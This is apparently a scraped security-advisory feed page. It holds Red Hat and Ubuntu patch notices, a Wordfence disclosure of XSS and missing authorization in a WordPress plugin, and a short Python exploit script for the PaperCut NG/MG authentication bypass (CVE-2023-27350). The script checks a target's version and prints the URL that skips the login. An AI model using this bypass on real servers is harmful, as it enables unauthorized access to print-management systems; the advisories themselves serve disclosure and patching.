5ey5WuxiypmDwjjjCvfYNmNXny+bjJFRZg1L+f9h8QOIT74odQDV/VHQGI+kxcbS  
eZ4zUCfkGNADO/wE6d/oqG7a/xcOM5PpGRsAPPEmlqr55T580Yk4XlkH58dLeJnt  
58/tWrFExCp9vf/yrIBU1dOQ2DPt1Ojfnv+FJshE0ACKqMf44UaJ+Rynl2tug/jm  
d4Qi5A069X7aKIc3KlmWXwMzkq50cav3v2zcxSw/ZbdD/B8RsNh4CxDv2YlI6WlF  
SYvBCHECv5vbTpeDAf3LCiOWUjkOjNFCc4E7Z+Q8hMKGD42sCkqI4JVHUrXcKJ3j  
rviRGchXk/crBclb7l4d4hEf4OBlecVyLxvUstwnXbAfHwSIijKICdKedsuA/ZaK  
uRJHz2x1XWvDgicT7GiDvUQBVCkn7FhXNxj6zOTJjNhPVOMxE22ruHP99LyBuq2F  
f2885QehzgCxILbB0UOJwDHcNMjM7XVxp4gAOcqN1+s9hYipPOcIuiFYcEvWBvu2  
Spj4xr67uU/LMhTc7MEyDdU4A9rhLQVHc7QZeL9wBVzoZpmCOxIJW4S55JqVeUXs  
wb99ZKmdDuRcXLqtf8gdBlWW/qGMlXO3zYZ5h6DVZWkeaYwZVFRiM4V3jLDzcGTo  
VsFDFZG19M8=  
=A26t  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1890-01

Red Hat Security Advisory 2023-1889-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1889-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1889  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
java-11-openjdk-11.0.19.0.7-1.el8_4.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_4.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_4.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_4.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.4):

aarch64:  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_4.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_4.aarch64.rpm

ppc64le:  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_4.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_4.ppc64le.rpm

s390x:  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_4.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_4.s390x.rpm

x86_64:  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_4.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgr+dzjgjWX9erEAQi9Rw//XYBUgUj3GJUDvdM8Yh/PCQLE2Zxr05X5  
AC4AmfyISaoromOnlAjXxEPX8R49AckJ39HTF6fv9EAuon4wS8kTI1T6j4wnU1wl  
vobLLoLBq6rA3bEafR3m0kRA+0o3ATPjWeeyJgV14dUr4kmcHIaVmKMKz9rFKGk3  
HMYn/GSMOIbkq3cKa1ecpK82JX/jGUSe1RIASX2yzpGmu5+3GgE77KiJV3+gAWiT  
5HPrLc8U8TKGA+Mc8D2e6iJjFkHI7O04MAXljStnw/Nmrc0s2gjAkZ64Z7AJk/Lr  
4qash6TkplCqDYr/61WWe4QZciHhr+HVn0sM/NaEnSV5IF/r4XwLChMV8w5YlOnL  
yKV8XQr8v3d6vJDfvtDlQdRTuwM/9lKQFKkEOvlnOJyNajG6AVO4pT/khrCdrwWI  
Qlsyjvvcu7bqkEsJkXzjnXcD6cDRDnSUZ08uv3ZswT019GMat4wUEq6gQc7Hr0Ei  
BPFQHGt9M6SQtc3d8dBcc10+kQqdio8zhiZ4Tv0Y1vfs0uZc9BCjwc9eu0iWthd9  
Cjea4IsJNQNZ8msLAl5e8v/qKuqKisx7+P1YZqZlpLGdyoB5bos0TFvaFYd5ntt5  
ellurjQAwGKdm2S4hVE2A+aclYFtIi5wUKMCaOExuOoV4yrM2t/5IJALVNeomGUb  
2zor28nqvKY=  
=+mp1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1889-01

PaperCut NG/MG version 22.0.4 suffers from an authentication bypass vulnerability.

    # Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass# Date: 21 April 2023# Exploit Author: MaanVader# Vendor Homepage: https://www.papercut.com/# Version: 8.0 or later# Tested on: 22.0.4# CVE: CVE-2023-27350import requestsfrom bs4 import BeautifulSoupimport redef vuln_version():    ip = input("Enter the ip address: ")    url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"    response = requests.get(url)    soup = BeautifulSoup(response.text, 'html.parser')    text_div = soup.find('div', class_='text')    product_span = text_div.find('span', class_='product')    # Search for the first span element containing a version number    version_span = None    for span in text_div.find_all('span'):        version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())        if version_match:            version_span = span            break    if version_span is None:        print('Not Vulnerable')    else:        version_str = version_span.text.strip()        print('Version:', version_str)        print("Vulnerable version")        print(f"Step 1 visit this url first in your browser: {url}")        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")if __name__ =="__main__":    vuln_version()

PaperCut NG/MG 22.0.4 Authentication Bypass

WordPress Shield Security Smart Bot Blocking and Intrusion Prevention plugin versions 17.0.17 and below suffer from cross site scripting and missing authorization vulnerabilities.

    Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention Plugin Slug: wp-simple-firewallAffected Versions: <= 17.0.17CVE ID: CVE-2023-0992 CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N Researcher/s: Ramuel Gall Fully Patched Version: 17.0.18The Shield Security plugin for WordPress is vulnerable to stored Cross-Site Scripting in versions up to, and including, 17.0.17 via the 'User-Agent' header. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.Description: Shield Security <= 17.0.17 - Missing Authorization Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention Plugin Slug: wp-simple-firewallAffected Versions: <= 17.0.17CVE ID: CVE-2023-0993 CVSS Score: 4.3 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N Researcher/s: Ramuel Gall Fully Patched Version: 17.0.18The Shield Security plugin for WordPress is vulnerable to Missing Authorization on the 'theme-plugin-file' AJAX action in versions up to, and including, 17.0.17. This allows authenticated attackers to add arbitrary audit log entries indicating that a theme or plugin has been edited, and is also a vector for Cross-Site Scripting via CVE-2023-0992.Vulnerability AnalysisThe Shield Security plugin includes a number of features, including an audit log that records certain types of suspicious activity, such as plugin and theme installation, modification, post deletion, and other types of activity that might impact the site. While most of these events require authentication or higher privileges in order to trigger, we found that certain events could be triggered by unauthenticated users. In particular, failed attempts to authenticate using application passwords, new user registrations, and spam activity are among the actions recorded for unauthenticated users.The audit log records metadata about the client that performed the logged activity, including the client’s User-Agent, which can be accessed by clicking the “Meta” tag icon on an audit log entry. Unfortunately, the metadata was not escaped when it was output. While most of the metadata collected about a request has a very strict format and can only be spoofed to a limited extent, User-Agent strings are alphanumeric, and we were able to inject a script in an iframe in the User-Agent header that fired when an administrator viewed an event entry:shieldalert-1024x454 While this exploit does technically require user interaction, it can be considered “Passive” user interaction, that is, it does not require tricking the administrator into performing any actions they might not have performed otherwise. Depending on the payload used, an attacker could use the script executing in the administrator’s browser to create a new administrator account under their control. Additionally, this exploit can be automated, and can be exploited by unauthenticated attackers via a variety of vectors, at least one of which is likely to be present in most common site configurations. As such it earns its High severity rating.The second vulnerability was much lower in severity and consisted of a missing authorization check on the ‘edit-theme-plugin-file’ AJAX action, which is used to record edits to plugin or theme files. The primary consequence of this is that an authenticated attacker can spoof an audit log entry indicating that any file belonging to any plugin or theme on the site was edited. While this is primarily a nuisance, since it can be used to create audit log entries it is yet another vector to exploit the aforementioned Cross-Site Scripting vulnerability.Disclosure TimelineMarch 20, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. We responsibly disclose the plugin to the developer, who responds quickly and releases a patch in version 17.0.18.April 19, 2023 – The firewall rule becomes available to all Wordfence users.ConclusionIn today’s post, we detailed a High Severity Cross-Site Scripting vulnerability in Shield Security. We also detailed a lower-severity issue allowing authenticated attackers to spoof audit log entries indicating that plugin and theme files had been edited. These vulnerabilities have been fully patched in version 17.0.18.Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 20, 2023. Sites still using the free version of Wordfence received the same protection on April 19, 2023.If you know a friend or colleague who is using the Shield Security plugin on their site, we highly recommend forwarding this advisory to them as the Cross-Site Scripting vulnerability can allow Unauthenticated attackers to execute malicious JavaScript in an administrator’s browser, which can lead to site takeover.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. Thanks to Paul Goodchild from Shield Security for patching the issue quickly.

WordPress Shield Security 17.0.17 Cross Site Scripting / Missing Authorization

Ubuntu Security Notice 6038-1 - It was discovered that the Go net/http module incorrectly handled Transfer-Encoding headers in the HTTP/1 client. A remote attacker could possibly use this issue to perform an HTTP Request Smuggling attack. It was discovered that Go did not properly manage memory under certain circumstances. An attacker could possibly use this issue to cause a panic resulting into a denial of service.

    =========================================================================Ubuntu Security Notice USN-6038-1April 25, 2023golang-1.18 vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Go.Software Description:- golang-1.18: Go programming language compiler - metapackageDetails:It was discovered that the Go net/http module incorrectly handledTransfer-Encoding headers in the HTTP/1 client. A remote attacker couldpossibly use this issue to perform an HTTP Request Smuggling attack.(CVE-2022-1705)It was discovered that Go did not properly manage memory under certaincircumstances. An attacker could possibly use this issue to cause a panicresulting into a denial of service. (CVE-2022-1962, CVE-2022-27664,CVE-2022-28131, CVE-2022-30630, CVE-2022-30631, CVE-2022-30632,CVE-2022-30633, CVE-2022-30635, CVE-2022-32189, CVE-2022-41715,CVE-2022-41717, CVE-2023-24534, CVE-2023-24537)It was discovered that Go did not properly implemented the maximum size offile headers in Reader.Read. An attacker could possibly use this issue tocause a panic resulting into a denial of service. (CVE-2022-2879)It was discovered that the Go net/http module incorrectly handled queryparameters in requests forwarded by ReverseProxy. A remote attacker couldpossibly use this issue to perform an HTTP Query Parameter Smuggling attack.(CVE-2022-2880)It was discovered that Go did not properly manage the permissions forFaccessat function. A attacker could possibly use this issue to exposesensitive information. (CVE-2022-29526)It was discovered that Go did not properly generate the values forticket_age_add in session tickets. An attacker could possibly use thisissue to observe TLS handshakes to correlate successive connections bycomparing ticket ages during session resumption. (CVE-2022-30629)It was discovered that Go did not properly manage client IP addresses innet/http. An attacker could possibly use this issue to cause ReverseProxyto set the client IP as the value of the X-Forwarded-For header.(CVE-2022-32148)It was discovered that Go did not properly validate backticks (`) asJavascript string delimiters, and do not escape them as expected. Anattacker could possibly use this issue to inject arbitrary Javascript codeinto the Go template. (CVE-2023-24538)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  golang-1.18                     1.18.1-1ubuntu1.1  golang-1.18-go                  1.18.1-1ubuntu1.1  golang-1.18-src                 1.18.1-1ubuntu1.1Ubuntu 20.04 LTS:  golang-1.18                     1.18.1-1ubuntu1~20.04.2  golang-1.18-go                  1.18.1-1ubuntu1~20.04.2  golang-1.18-src                 1.18.1-1ubuntu1~20.04.2Ubuntu 18.04 LTS:  golang-1.18                     1.18.1-1ubuntu1~18.04.4  golang-1.18-go                  1.18.1-1ubuntu1~18.04.4  golang-1.18-src                 1.18.1-1ubuntu1~18.04.4In general, a standard system update will make all the necessary changes.You still need to update all the packages built with the affected version.References:  https://ubuntu.com/security/notices/USN-6038-1  CVE-2022-1705, CVE-2022-1962, CVE-2022-27664, CVE-2022-28131,  CVE-2022-2879, CVE-2022-2880, CVE-2022-29526, CVE-2022-30629,  CVE-2022-30630, CVE-2022-30631, CVE-2022-30632, CVE-2022-30633,  CVE-2022-30635, CVE-2022-32148, CVE-2022-32189, CVE-2022-41715,  CVE-2022-41717, CVE-2023-24534, CVE-2023-24537, CVE-2023-24538Package Information:  https://launchpad.net/ubuntu/+source/golang-1.18/1.18.1-1ubuntu1.1  https://launchpad.net/ubuntu/+source/golang-1.18/1.18.1-1ubuntu1~20.04.2  https://launchpad.net/ubuntu/+source/golang-1.18/1.18.1-1ubuntu1~18.04.4

Ubuntu Security Notice USN-6038-1

Ubuntu Security Notice 6040-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the OverlayFS implementation in the Linux kernel did not properly handle copy up operation in some conditions. A local attacker could possibly use this to gain elevated privileges.

==========================================================================  
Ubuntu Security Notice USN-6040-1  
April 25, 2023

linux-hwe-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-hwe-5.15: Linux hardware enablement (HWE) kernel

Details:

It was discovered that the Traffic-Control Index (TCINDEX) implementation  
in the Linux kernel contained a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-1281)

It was discovered that the OverlayFS implementation in the Linux kernel did  
not properly handle copy up operation in some conditions. A local attacker  
could possibly use this to gain elevated privileges. (CVE-2023-0386)

Haowei Yan discovered that a race condition existed in the Layer 2  
Tunneling Protocol (L2TP) implementation in the Linux kernel. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-4129)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

It was discovered that the NTFS file system implementation in the Linux  
kernel contained a null pointer dereference in some situations. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-4842)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

It was discovered that the Human Interface Device (HID) support driver in  
the Linux kernel contained a type confusion vulnerability in some  
situations. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1073)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

It was discovered that the NFS implementation in the Linux kernel did not  
properly handle pending tasks in some situations. A local attacker could  
use this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2023-1652)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-70-generic   5.15.0-70.77~20.04.1  
   linux-image-5.15.0-70-generic-64k  5.15.0-70.77~20.04.1  
   linux-image-5.15.0-70-generic-lpae  5.15.0-70.77~20.04.1  
   linux-image-generic-64k-hwe-20.04  5.15.0.70.77~20.04.31  
   linux-image-generic-hwe-20.04   5.15.0.70.77~20.04.31  
   linux-image-generic-lpae-hwe-20.04  5.15.0.70.77~20.04.31  
   linux-image-oem-20.04           5.15.0.70.77~20.04.31  
   linux-image-oem-20.04b          5.15.0.70.77~20.04.31  
   linux-image-oem-20.04c          5.15.0.70.77~20.04.31  
   linux-image-oem-20.04d          5.15.0.70.77~20.04.31  
   linux-image-virtual-hwe-20.04   5.15.0.70.77~20.04.31

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6040-1  
